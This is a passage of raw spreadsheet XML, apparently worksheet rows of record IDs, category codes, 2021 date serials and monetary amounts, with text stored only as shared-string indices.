      <c r="E4576">
        <v>11</v>
      </c>
      <c r="F4576" t="s">
        <v>8913</v>
      </c>
      <c r="G4576" s="1">
        <v>44327</v>
      </c>
      <c r="H4576">
        <v>50000</v>
      </c>
      <c r="I4576" t="s">
        <v>13742</v>
      </c>
    </row>
    <row r="4577" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4577">
        <v>25196</v>
      </c>
      <c r="B4577">
        <v>5582</v>
      </c>
      <c r="C4577" t="s">
        <v>9010</v>
      </c>
      <c r="D4577" t="s">
        <v>13737</v>
      </c>
      <c r="E4577">
        <v>11</v>
      </c>
      <c r="F4577" t="s">
        <v>13745</v>
      </c>
      <c r="G4577" s="1">
        <v>44327</v>
      </c>
      <c r="H4577">
        <v>49000</v>
      </c>
      <c r="I4577" t="s">
        <v>13742</v>
      </c>
    </row>
    <row r="4578" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4578">
        <v>25197</v>
      </c>
      <c r="B4578">
        <v>5582</v>
      </c>
      <c r="C4578" t="s">
        <v>9010</v>
      </c>
      <c r="D4578" t="s">
        <v>13737</v>
      </c>
      <c r="E4578">
        <v>11</v>
      </c>
      <c r="F4578" t="s">
        <v>13596</v>
      </c>
      <c r="G4578" s="1">
        <v>44327</v>
      </c>
      <c r="H4578">
        <v>45000</v>
      </c>
      <c r="I4578" t="s">
        <v>13742</v>
      </c>
    </row>
    <row r="4579" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4579">
        <v>25198</v>
      </c>
      <c r="B4579">
        <v>5476</v>
      </c>
      <c r="C4579" t="s">
        <v>8857</v>
      </c>
      <c r="D4579" t="s">
        <v>13746</v>
      </c>
      <c r="E4579">
        <v>11</v>
      </c>
      <c r="F4579" t="s">
        <v>2236</v>
      </c>
      <c r="G4579" s="1">
        <v>44354</v>
      </c>
      <c r="H4579">
        <v>50000</v>
      </c>
      <c r="J4579" t="s">
        <v>11722</v>
      </c>
    </row>
    <row r="4580" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4580">
        <v>25199</v>
      </c>
      <c r="B4580">
        <v>5476</v>
      </c>
      <c r="C4580" t="s">
        <v>8857</v>
      </c>
      <c r="D4580" t="s">
        <v>13746</v>
      </c>
      <c r="E4580">
        <v>11</v>
      </c>
      <c r="F4580" t="s">
        <v>13747</v>
      </c>
      <c r="G4580" s="1">
        <v>44354</v>
      </c>
      <c r="H4580">
        <v>100000</v>
      </c>
      <c r="J4580" t="s">
        <v>11722</v>
      </c>
    </row>
    <row r="4581" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4581">
        <v>25200</v>
      </c>
      <c r="B4581">
        <v>5476</v>
      </c>
      <c r="C4581" t="s">
        <v>8857</v>
      </c>
      <c r="D4581" t="s">
        <v>13746</v>
      </c>
      <c r="E4581">
        <v>11</v>
      </c>
      <c r="F4581" t="s">
        <v>13748</v>
      </c>
      <c r="G4581" s="1">
        <v>44354</v>
      </c>
      <c r="H4581">
        <v>100000</v>
      </c>
      <c r="J4581" t="s">
        <v>13286</v>
      </c>
    </row>
    <row r="4582" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4582">
        <v>25201</v>
      </c>
      <c r="B4582">
        <v>5476</v>
      </c>
      <c r="C4582" t="s">
        <v>8857</v>
      </c>
      <c r="D4582" t="s">
        <v>13746</v>
      </c>
      <c r="E4582">
        <v>11</v>
      </c>
      <c r="F4582" t="s">
        <v>10463</v>
      </c>
      <c r="G4582" s="1">
        <v>44354</v>
      </c>
      <c r="H4582">
        <v>100000</v>
      </c>
      <c r="J4582" t="s">
        <v>10749</v>
      </c>
    </row>
    <row r="4583" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4583">
        <v>25202</v>
      </c>
      <c r="B4583">
        <v>984</v>
      </c>
      <c r="C4583" t="s">
        <v>16560</v>
      </c>
      <c r="D4583" t="s">
        <v>16561</v>
      </c>
      <c r="E4583">
        <v>17</v>
      </c>
      <c r="F4583" t="s">
        <v>9217</v>
      </c>
      <c r="G4583" s="1">
        <v>44337</v>
      </c>
      <c r="H4583" s="4">
        <v>40000</v>
      </c>
      <c r="I4583" t="s">
        <v>9436</v>
      </c>
      <c r="J4583" t="s">
        <v>9553</v>
      </c>
    </row>
    <row r="4584" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4584">
        <v>25211</v>
      </c>
      <c r="B4584">
        <v>5238</v>
      </c>
      <c r="C4584" t="s">
        <v>8318</v>
      </c>
      <c r="D4584" t="s">
        <v>12889</v>
      </c>
      <c r="E4584">
        <v>26</v>
      </c>
      <c r="F4584" t="s">
        <v>9673</v>
      </c>
      <c r="G4584" s="1">
        <v>44372</v>
      </c>
      <c r="H4584">
        <v>500</v>
      </c>
      <c r="I4584" t="s">
        <v>9522</v>
      </c>
      <c r="J4584" t="s">
        <v>13749</v>
      </c>
    </row>
    <row r="4585" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4585">
        <v>25214</v>
      </c>
      <c r="B4585">
        <v>5473</v>
      </c>
      <c r="C4585" t="s">
        <v>8866</v>
      </c>
      <c r="D4585" t="s">
        <v>13750</v>
      </c>
      <c r="E4585">
        <v>26</v>
      </c>
      <c r="F4585" t="s">
        <v>547</v>
      </c>
      <c r="G4585" s="1">
        <v>44322</v>
      </c>
      <c r="H4585">
        <v>40000</v>
      </c>
      <c r="I4585" t="s">
        <v>13751</v>
      </c>
      <c r="J4585" t="s">
        <v>10668</v>
      </c>
    </row>
    <row r="4586" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4586">
        <v>25215</v>
      </c>
      <c r="B4586">
        <v>5191</v>
      </c>
      <c r="C4586" t="s">
        <v>8206</v>
      </c>
      <c r="D4586" t="s">
        <v>13752</v>
      </c>
      <c r="E4586">
        <v>13</v>
      </c>
      <c r="F4586" t="s">
        <v>13753</v>
      </c>
      <c r="G4586" s="1">
        <v>44370</v>
      </c>
      <c r="H4586">
        <v>14500</v>
      </c>
      <c r="I4586" t="s">
        <v>13754</v>
      </c>
      <c r="J4586" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="4587" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4587">
        <v>25216</v>
      </c>
      <c r="B4587">
        <v>1745</v>
      </c>
      <c r="C4587" t="s">
        <v>6529</v>
      </c>
      <c r="D4587" t="s">
        <v>13755</v>
      </c>
      <c r="E4587">
        <v>16</v>
      </c>
      <c r="F4587" t="s">
        <v>9447</v>
      </c>
      <c r="G4587" s="1">
        <v>44365</v>
      </c>
      <c r="H4587">
        <v>500000</v>
      </c>
      <c r="I4587" t="s">
        <v>10238</v>
      </c>
    </row>
    <row r="4588" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4588">
        <v>25217</v>
      </c>
      <c r="B4588">
        <v>1745</v>
      </c>
      <c r="C4588" t="s">
        <v>6529</v>
      </c>
      <c r="D4588" t="s">
        <v>13755</v>
      </c>
      <c r="E4588">
        <v>16</v>
      </c>
      <c r="F4588" t="s">
        <v>609</v>
      </c>
      <c r="G4588" s="1">
        <v>44365</v>
      </c>
      <c r="H4588">
        <v>1200000</v>
      </c>
      <c r="I4588" t="s">
        <v>13756</v>
      </c>
    </row>
    <row r="4589" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4589">
        <v>25218</v>
      </c>
      <c r="B4589">
        <v>1745</v>
      </c>
      <c r="C4589" t="s">
        <v>6529</v>
      </c>
      <c r="D4589" t="s">
        <v>13755</v>
      </c>
      <c r="E4589">
        <v>16</v>
      </c>
      <c r="F4589" t="s">
        <v>13757</v>
      </c>
      <c r="G4589" s="1">
        <v>44365</v>
      </c>
      <c r="H4589">
        <v>3300000</v>
      </c>
      <c r="I4589" t="s">
        <v>13758</v>
      </c>
    </row>
    <row r="4590" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4590">
        <v>25219</v>
      </c>
      <c r="B4590">
        <v>1637</v>
      </c>
      <c r="C4590" t="s">
        <v>4278</v>
      </c>
      <c r="D4590" t="s">
        <v>13759</v>
      </c>
      <c r="E4590">
        <v>17</v>
      </c>
      <c r="F4590" t="s">
        <v>13760</v>
      </c>
      <c r="G4590" s="1">
        <v>44347</v>
      </c>
      <c r="H4590">
        <v>150000</v>
      </c>
      <c r="J4590" t="s">
        <v>10412</v>
      </c>
    </row>
    <row r="4591" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4591">
        <v>25220</v>
      </c>
      <c r="B4591">
        <v>1637</v>
      </c>
      <c r="C4591" t="s">
        <v>4278</v>
      </c>
      <c r="D4591" t="s">
        <v>13759</v>
      </c>
      <c r="E4591">
        <v>17</v>
      </c>
      <c r="F4591" t="s">
        <v>13761</v>
      </c>
      <c r="G4591" s="1">
        <v>44347</v>
      </c>
      <c r="H4591">
        <v>150000</v>
      </c>
      <c r="J4591" t="s">
        <v>10412</v>
      </c>
    </row>
    <row r="4592" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4592">
        <v>25221</v>
      </c>
      <c r="B4592">
        <v>5541</v>
      </c>
      <c r="C4592" t="s">
        <v>9022</v>
      </c>
      <c r="D4592" t="s">
        <v>13762</v>
      </c>
      <c r="E4592">
        <v>31</v>
      </c>
      <c r="F4592" t="s">
        <v>2236</v>
      </c>
      <c r="G4592" s="1">
        <v>44322</v>
      </c>
      <c r="H4592">
        <v>1200</v>
      </c>
      <c r="I4592" t="s">
        <v>10642</v>
      </c>
      <c r="J4592" t="s">
        <v>13763</v>
      </c>
    </row>
    <row r="4593" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4593">
        <v>25222</v>
      </c>
      <c r="B4593">
        <v>5541</v>
      </c>
      <c r="C4593" t="s">
        <v>9022</v>
      </c>
      <c r="D4593" t="s">
        <v>13762</v>
      </c>
      <c r="E4593">
        <v>31</v>
      </c>
      <c r="F4593" t="s">
        <v>13764</v>
      </c>
      <c r="G4593" s="1">
        <v>44322</v>
      </c>
      <c r="H4593">
        <v>1200</v>
      </c>
      <c r="I4593" t="s">
        <v>10642</v>
      </c>
      <c r="J4593" t="s">
        <v>13765</v>
      </c>
    </row>
    <row r="4594" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4594">
        <v>25223</v>
      </c>
      <c r="B4594">
        <v>5541</v>
      </c>
      <c r="C4594" t="s">
        <v>9022</v>
      </c>
      <c r="D4594" t="s">
        <v>13762</v>
      </c>
      <c r="E4594">
        <v>31</v>
      </c>
      <c r="F4594" t="s">
        <v>13766</v>
      </c>
      <c r="G4594" s="1">
        <v>44322</v>
      </c>
      <c r="H4594">
        <v>1200</v>
      </c>
      <c r="I4594" t="s">
        <v>10642</v>
      </c>
      <c r="J4594" t="s">
        <v>13763</v>
      </c>
    </row>
    <row r="4595" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4595">
        <v>25224</v>
      </c>
      <c r="B4595">
        <v>5541</v>
      </c>
      <c r="C4595" t="s">
        <v>9022</v>
      </c>
      <c r="D4595" t="s">
        <v>13762</v>
      </c>
      <c r="E4595">
        <v>31</v>
      </c>
      <c r="F4595" t="s">
        <v>9437</v>
      </c>
      <c r="G4595" s="1">
        <v>44322</v>
      </c>
      <c r="H4595">
        <v>1200</v>
      </c>
      <c r="I4595" t="s">
        <v>10642</v>
      </c>
      <c r="J4595" t="s">
        <v>13767</v>
      </c>
    </row>
    <row r="4596" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4596">
        <v>25225</v>
      </c>
      <c r="B4596">
        <v>5541</v>
      </c>
      <c r="C4596" t="s">
        <v>9022</v>
      </c>
      <c r="D4596" t="s">
        <v>13762</v>
      </c>
      <c r="E4596">
        <v>31</v>
      </c>
      <c r="F4596" t="s">
        <v>1746</v>
      </c>
      <c r="G4596" s="1">
        <v>44322</v>
      </c>
      <c r="H4596">
        <v>1200</v>
      </c>
      <c r="I4596" t="s">
        <v>10642</v>
      </c>
      <c r="J4596" t="s">
        <v>13768</v>
      </c>
    </row>
    <row r="4597" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4597">
        <v>25226</v>
      </c>
      <c r="B4597">
        <v>5541</v>
      </c>
      <c r="C4597" t="s">
        <v>9022</v>
      </c>
      <c r="D4597" t="s">
        <v>13762</v>
      </c>
      <c r="E4597">
        <v>31</v>
      </c>
      <c r="F4597" t="s">
        <v>9435</v>
      </c>
      <c r="G4597" s="1">
        <v>44322</v>
      </c>
      <c r="H4597">
        <v>1200</v>
      </c>
      <c r="I4597" t="s">
        <v>10642</v>
      </c>
      <c r="J4597" t="s">
        <v>13768</v>
      </c>
    </row>
    <row r="4598" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4598">
        <v>25227</v>
      </c>
      <c r="B4598">
        <v>5541</v>
      </c>
      <c r="C4598" t="s">
        <v>9022</v>
      </c>
      <c r="D4598" t="s">
        <v>13762</v>
      </c>
      <c r="E4598">
        <v>31</v>
      </c>
      <c r="F4598" t="s">
        <v>13769</v>
      </c>
      <c r="G4598" s="1">
        <v>44322</v>
      </c>
      <c r="H4598">
        <v>1200</v>
      </c>
      <c r="I4598" t="s">
        <v>10642</v>
      </c>
      <c r="J4598" t="s">
        <v>13768</v>
      </c>
    </row>
    <row r="4599" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4599">
        <v>25228</v>
      </c>
      <c r="B4599">
        <v>5594</v>
      </c>
      <c r="C4599" t="s">
        <v>9029</v>
      </c>
      <c r="D4599" t="s">
        <v>13770</v>
      </c>
      <c r="E4599">
        <v>24</v>
      </c>
      <c r="F4599" t="s">
        <v>364</v>
      </c>
      <c r="G4599" s="1">
        <v>44379</v>
      </c>
      <c r="H4599">
        <v>6164000</v>
      </c>
      <c r="I4599" t="s">
        <v>10386</v>
      </c>
      <c r="J4599" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="4600" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4600">
        <v>25229</v>
      </c>
      <c r="B4600">
        <v>600</v>
      </c>
      <c r="C4600" t="s">
        <v>2032</v>
      </c>
      <c r="D4600" t="s">
        <v>12239</v>
      </c>
      <c r="E4600">
        <v>16</v>
      </c>
      <c r="F4600" t="s">
        <v>7057</v>
      </c>
      <c r="G4600" s="1">
        <v>44363</v>
      </c>
      <c r="H4600">
        <v>100000</v>
      </c>
      <c r="I4600" t="s">
        <v>10409</v>
      </c>
      <c r="J4600" t="s">
        <v>13771</v>
      </c>
    </row>
    <row r="4601" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4601">
        <v>25230</v>
      </c>
      <c r="B4601">
        <v>5238</v>
      </c>
      <c r="C4601" t="s">
        <v>8318</v>
      </c>
      <c r="D4601" t="s">
        <v>12889</v>
      </c>
      <c r="E4601">
        <v>26</v>
      </c>
      <c r="F4601" t="s">
        <v>10304</v>
      </c>
      <c r="G4601" s="1">
        <v>44372</v>
      </c>
      <c r="H4601">
        <v>1000</v>
      </c>
      <c r="I4601" t="s">
        <v>9522</v>
      </c>
      <c r="J4601" t="s">
        <v>13749</v>
      </c>
    </row>
    <row r="4602" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4602">
        <v>25234</v>
      </c>
      <c r="B4602">
        <v>5611</v>
      </c>
      <c r="C4602" t="s">
        <v>9003</v>
      </c>
      <c r="D4602" t="s">
        <v>13772</v>
      </c>
      <c r="E4602">
        <v>9</v>
      </c>
      <c r="F4602" t="s">
        <v>13773</v>
      </c>
      <c r="G4602" s="1">
        <v>44301</v>
      </c>
      <c r="H4602">
        <v>30</v>
      </c>
      <c r="I4602" t="s">
        <v>13774</v>
      </c>
      <c r="J4602" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="4603" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4603">
        <v>25235</v>
      </c>
      <c r="B4603">
        <v>2203</v>
      </c>
      <c r="C4603" t="s">
        <v>6397</v>
      </c>
      <c r="D4603" t="s">
        <v>11891</v>
      </c>
      <c r="E4603">
        <v>33</v>
      </c>
      <c r="F4603" t="s">
        <v>13775</v>
      </c>
      <c r="G4603" s="1">
        <v>44358</v>
      </c>
      <c r="H4603">
        <v>100000</v>
      </c>
      <c r="I4603" t="s">
        <v>10642</v>
      </c>
      <c r="J4603" t="s">
        <v>9934</v>
      </c>
    </row>
    <row r="4604" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4604">
        <v>25236</v>
      </c>
      <c r="B4604">
        <v>2203</v>
      </c>
      <c r="C4604" t="s">
        <v>6397</v>
      </c>
      <c r="D4604" t="s">
        <v>11891</v>
      </c>
      <c r="E4604">
        <v>33</v>
      </c>
      <c r="F4604" t="s">
        <v>13776</v>
      </c>
      <c r="G4604" s="1">
        <v>44358</v>
      </c>
      <c r="H4604">
        <v>75000</v>
      </c>
      <c r="I4604" t="s">
        <v>10642</v>
      </c>
      <c r="J4604" t="s">
        <v>10858</v>
      </c>
    </row>
    <row r="4605" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4605">
        <v>25237</v>
      </c>
      <c r="B4605">
        <v>2203</v>
      </c>
      <c r="C4605" t="s">
        <v>6397</v>
      </c>
      <c r="D4605" t="s">
        <v>11891</v>
      </c>
      <c r="E4605">
        <v>33</v>
      </c>
      <c r="F4605" t="s">
        <v>3763</v>
      </c>
      <c r="G4605" s="1">
        <v>44358</v>
      </c>
      <c r="H4605">
        <v>75000</v>
      </c>
      <c r="I4605" t="s">
        <v>10642</v>
      </c>
      <c r="J4605" t="s">
        <v>10858</v>
      </c>
    </row>
    <row r="4606" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4606">
        <v>25238</v>
      </c>
      <c r="B4606">
        <v>2203</v>
      </c>
      <c r="C4606" t="s">
        <v>6397</v>
      </c>
      <c r="D4606" t="s">
        <v>11891</v>
      </c>
      <c r="E4606">
        <v>33</v>
      </c>
      <c r="F4606" t="s">
        <v>2236</v>
      </c>
      <c r="G4606" s="1">
        <v>44358</v>
      </c>
      <c r="H4606">
        <v>100000</v>
      </c>
      <c r="I4606" t="s">
        <v>9693</v>
      </c>
      <c r="J4606" t="s">
        <v>10858</v>
      </c>
    </row>
    <row r="4607" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4607">
        <v>25239</v>
      </c>
      <c r="B4607">
        <v>2203</v>
      </c>
      <c r="C4607" t="s">
        <v>6397</v>
      </c>
      <c r="D4607" t="s">
        <v>11891</v>
      </c>
      <c r="E4607">
        <v>33</v>
      </c>
      <c r="F4607" t="s">
        <v>9437</v>
      </c>
      <c r="G4607" s="1">
        <v>44358</v>
      </c>
      <c r="H4607">
        <v>50</v>
      </c>
      <c r="I4607" t="s">
        <v>9693</v>
      </c>
      <c r="J4607" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="4608" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4608">
        <v>25241</v>
      </c>
      <c r="B4608">
        <v>2853</v>
      </c>
      <c r="C4608" t="s">
        <v>8871</v>
      </c>
      <c r="D4608" t="s">
        <v>13777</v>
      </c>
      <c r="E4608">
        <v>23</v>
      </c>
      <c r="F4608" t="s">
        <v>673</v>
      </c>
      <c r="G4608" s="1">
        <v>44322</v>
      </c>
      <c r="H4608">
        <v>750000</v>
      </c>
      <c r="J4608" t="s">
        <v>13778</v>
      </c>
    </row>
    <row r="4609" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4609">
        <v>25242</v>
      </c>
      <c r="B4609">
        <v>2853</v>
      </c>
      <c r="C4609" t="s">
        <v>8871</v>
      </c>
      <c r="D4609" t="s">
        <v>13777</v>
      </c>
      <c r="E4609">
        <v>23</v>
      </c>
      <c r="F4609" t="s">
        <v>9441</v>
      </c>
      <c r="G4609" s="1">
        <v>44322</v>
      </c>
      <c r="H4609">
        <v>130000</v>
      </c>
      <c r="J4609" t="s">
        <v>13778</v>
      </c>
    </row>
    <row r="4610" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4610">
        <v>25248</v>
      </c>
      <c r="B4610">
        <v>1850</v>
      </c>
      <c r="C4610" t="s">
        <v>6559</v>
      </c>
      <c r="D4610" t="s">
        <v>13779</v>
      </c>
      <c r="E4610">
        <v>16</v>
      </c>
      <c r="F4610" t="s">
        <v>2407</v>
      </c>
      <c r="G4610" s="1">
        <v>44323</v>
      </c>
      <c r="H4610">
        <v>180000</v>
      </c>
      <c r="J4610" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4611" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4611">
        <v>25250</v>
      </c>
      <c r="B4611">
        <v>1689</v>
      </c>
      <c r="C4611" t="s">
        <v>4627</v>
      </c>
      <c r="D4611" t="s">
        <v>13780</v>
      </c>
      <c r="E4611">
        <v>5</v>
      </c>
      <c r="F4611" t="s">
        <v>13781</v>
      </c>
      <c r="G4611" s="1">
        <v>44336</v>
      </c>
      <c r="H4611">
        <v>29500</v>
      </c>
      <c r="I4611" t="s">
        <v>10518</v>
      </c>
      <c r="J4611" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4612" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4612">
        <v>25251</v>
      </c>
      <c r="B4612">
        <v>1689</v>
      </c>
      <c r="C4612" t="s">
        <v>4627</v>
      </c>
      <c r="D4612" t="s">
        <v>13780</v>
      </c>
      <c r="E4612">
        <v>5</v>
      </c>
      <c r="F4612" t="s">
        <v>13782</v>
      </c>
      <c r="G4612" s="1">
        <v>44336</v>
      </c>
      <c r="H4612">
        <v>24300</v>
      </c>
      <c r="I4612" t="s">
        <v>10518</v>
      </c>
      <c r="J4612" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4613" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4613">
        <v>25252</v>
      </c>
      <c r="B4613">
        <v>359</v>
      </c>
      <c r="C4613" t="s">
        <v>517</v>
      </c>
      <c r="D4613" t="s">
        <v>13783</v>
      </c>
      <c r="E4613">
        <v>11</v>
      </c>
      <c r="F4613" t="s">
        <v>8913</v>
      </c>
      <c r="G4613" s="1">
        <v>44327</v>
      </c>
      <c r="H4613">
        <v>100000</v>
      </c>
      <c r="I4613" t="s">
        <v>10442</v>
      </c>
      <c r="J4613" t="s">
        <v>10858</v>
      </c>
    </row>
    <row r="4614" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4614">
        <v>25253</v>
      </c>
      <c r="B4614">
        <v>161</v>
      </c>
      <c r="C4614" t="s">
        <v>2397</v>
      </c>
      <c r="D4614" t="s">
        <v>13784</v>
      </c>
      <c r="E4614">
        <v>11</v>
      </c>
      <c r="F4614" t="s">
        <v>8913</v>
      </c>
      <c r="G4614" s="1">
        <v>44327</v>
      </c>
      <c r="H4614">
        <v>100000</v>
      </c>
      <c r="I4614" t="s">
        <v>9485</v>
      </c>
      <c r="J4614" t="s">
        <v>10858</v>
      </c>
    </row>
    <row r="4615" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4615">
        <v>25254</v>
      </c>
      <c r="B4615">
        <v>161</v>
      </c>
      <c r="C4615" t="s">
        <v>2397</v>
      </c>
      <c r="D4615" t="s">
        <v>13784</v>
      </c>
      <c r="E4615">
        <v>11</v>
      </c>
      <c r="F4615" t="s">
        <v>13785</v>
      </c>
      <c r="G4615" s="1">
        <v>44327</v>
      </c>
      <c r="H4615">
        <v>100000</v>
      </c>
      <c r="I4615" t="s">
        <v>9550</v>
      </c>
      <c r="J4615" t="s">
        <v>13043</v>
      </c>
    </row>
    <row r="4616" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4616">
        <v>25255</v>
      </c>
      <c r="B4616">
        <v>161</v>
      </c>
      <c r="C4616" t="s">
        <v>2397</v>
      </c>
      <c r="D4616" t="s">
        <v>13784</v>
      </c>
      <c r="E4616">
        <v>11</v>
      </c>
      <c r="F4616" t="s">
        <v>9732</v>
      </c>
      <c r="G4616" s="1">
        <v>44327</v>
      </c>
      <c r="H4616">
        <v>100000</v>
      </c>
      <c r="I4616" t="s">
        <v>9550</v>
      </c>
      <c r="J4616" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4617" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4617">
        <v>25256</v>
      </c>
      <c r="B4617">
        <v>161</v>
      </c>
      <c r="C4617" t="s">
        <v>2397</v>
      </c>
      <c r="D4617" t="s">
        <v>13784</v>
      </c>
      <c r="E4617">
        <v>11</v>
      </c>
      <c r="F4617" t="s">
        <v>9437</v>
      </c>
      <c r="G4617" s="1">
        <v>44327</v>
      </c>
      <c r="H4617">
        <v>100000</v>
      </c>
      <c r="I4617" t="s">
        <v>9550</v>
      </c>
      <c r="J4617" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4618" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4618">
        <v>25257</v>
      </c>
      <c r="B4618">
        <v>1581</v>
      </c>
      <c r="C4618" t="s">
        <v>16562</v>
      </c>
      <c r="D4618" t="s">
        <v>16563</v>
      </c>
      <c r="E4618">
        <v>2</v>
      </c>
      <c r="F4618" t="s">
        <v>764</v>
      </c>
      <c r="G4618" s="1">
        <v>44343</v>
      </c>
      <c r="H4618" s="4">
        <v>100000</v>
      </c>
      <c r="I4618" t="s">
        <v>13786</v>
      </c>
      <c r="J4618" t="s">
        <v>9954</v>
      </c>
    </row>
    <row r="4619" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4619">
        <v>25258</v>
      </c>
      <c r="B4619">
        <v>5568</v>
      </c>
      <c r="C4619" t="s">
        <v>8997</v>
      </c>
      <c r="D4619" t="s">
        <v>13787</v>
      </c>
      <c r="E4619">
        <v>5</v>
      </c>
      <c r="F4619" t="s">
        <v>10463</v>
      </c>
      <c r="G4619" s="1">
        <v>44351</v>
      </c>
      <c r="H4619">
        <v>80</v>
      </c>
      <c r="I4619" t="s">
        <v>9638</v>
      </c>
    </row>
    <row r="4620" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4620">
        <v>25259</v>
      </c>
      <c r="B4620">
        <v>5568</v>
      </c>
      <c r="C4620" t="s">
        <v>8997</v>
      </c>
      <c r="D4620" t="s">
        <v>13787</v>
      </c>
      <c r="E4620">
        <v>5</v>
      </c>
      <c r="F4620" t="s">
        <v>13788</v>
      </c>
      <c r="G4620" s="1">
        <v>44351</v>
      </c>
      <c r="H4620">
        <v>280</v>
      </c>
      <c r="I4620" t="s">
        <v>9638</v>
      </c>
    </row>
    <row r="4621" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4621">
        <v>25260</v>
      </c>
      <c r="B4621">
        <v>5568</v>
      </c>
      <c r="C4621" t="s">
        <v>8997</v>
      </c>
      <c r="D4621" t="s">
        <v>13787</v>
      </c>
      <c r="E4621">
        <v>5</v>
      </c>
      <c r="F4621" t="s">
        <v>13789</v>
      </c>
      <c r="G4621" s="1">
        <v>44351</v>
      </c>
      <c r="H4621">
        <v>105</v>
      </c>
      <c r="I4621" t="s">
        <v>9638</v>
      </c>
    </row>
    <row r="4622" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4622">
        <v>25265</v>
      </c>
      <c r="B4622">
        <v>5461</v>
      </c>
      <c r="C4622" t="s">
        <v>8685</v>
      </c>
      <c r="D4622" t="s">
        <v>13790</v>
      </c>
      <c r="E4622">
        <v>26</v>
      </c>
      <c r="F4622" t="s">
        <v>364</v>
      </c>
      <c r="G4622" s="1">
        <v>44300</v>
      </c>
      <c r="H4622">
        <v>240000</v>
      </c>
      <c r="J4622" t="s">
        <v>13791</v>
      </c>
    </row>
    <row r="4623" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4623">
        <v>25266</v>
      </c>
      <c r="B4623">
        <v>2337</v>
      </c>
      <c r="C4623" t="s">
        <v>5129</v>
      </c>
      <c r="D4623" t="s">
        <v>10053</v>
      </c>
      <c r="E4623">
        <v>12</v>
      </c>
      <c r="F4623" t="s">
        <v>609</v>
      </c>
      <c r="G4623" s="1">
        <v>44337</v>
      </c>
      <c r="H4623">
        <v>5000</v>
      </c>
      <c r="J4623" t="s">
        <v>13792</v>
      </c>
    </row>
    <row r="4624" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4624">
        <v>25267</v>
      </c>
      <c r="B4624">
        <v>2337</v>
      </c>
      <c r="C4624" t="s">
        <v>5129</v>
      </c>
      <c r="D4624" t="s">
        <v>10053</v>
      </c>
      <c r="E4624">
        <v>12</v>
      </c>
      <c r="F4624" t="s">
        <v>4686</v>
      </c>
      <c r="G4624" s="1">
        <v>44337</v>
      </c>
      <c r="H4624">
        <v>3000</v>
      </c>
      <c r="J4624" t="s">
        <v>13793</v>
      </c>
    </row>
    <row r="4625" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4625">
        <v>25268</v>
      </c>
      <c r="B4625">
        <v>1574</v>
      </c>
      <c r="C4625" t="s">
        <v>2959</v>
      </c>
      <c r="D4625" t="s">
        <v>11410</v>
      </c>
      <c r="E4625">
        <v>18</v>
      </c>
      <c r="F4625" t="s">
        <v>13794</v>
      </c>
      <c r="G4625" s="1">
        <v>44375</v>
      </c>
      <c r="H4625">
        <v>192</v>
      </c>
      <c r="I4625" t="s">
        <v>13795</v>
      </c>
    </row>
    <row r="4626" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4626">
        <v>25277</v>
      </c>
      <c r="B4626">
        <v>5446</v>
      </c>
      <c r="C4626" t="s">
        <v>8880</v>
      </c>
      <c r="D4626" t="s">
        <v>13796</v>
      </c>
      <c r="E4626">
        <v>10</v>
      </c>
      <c r="F4626" t="s">
        <v>13797</v>
      </c>
      <c r="G4626" s="1">
        <v>44337</v>
      </c>
      <c r="H4626">
        <v>2400</v>
      </c>
      <c r="I4626" t="s">
        <v>13798</v>
      </c>
    </row>
    <row r="4627" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4627">
        <v>25278</v>
      </c>
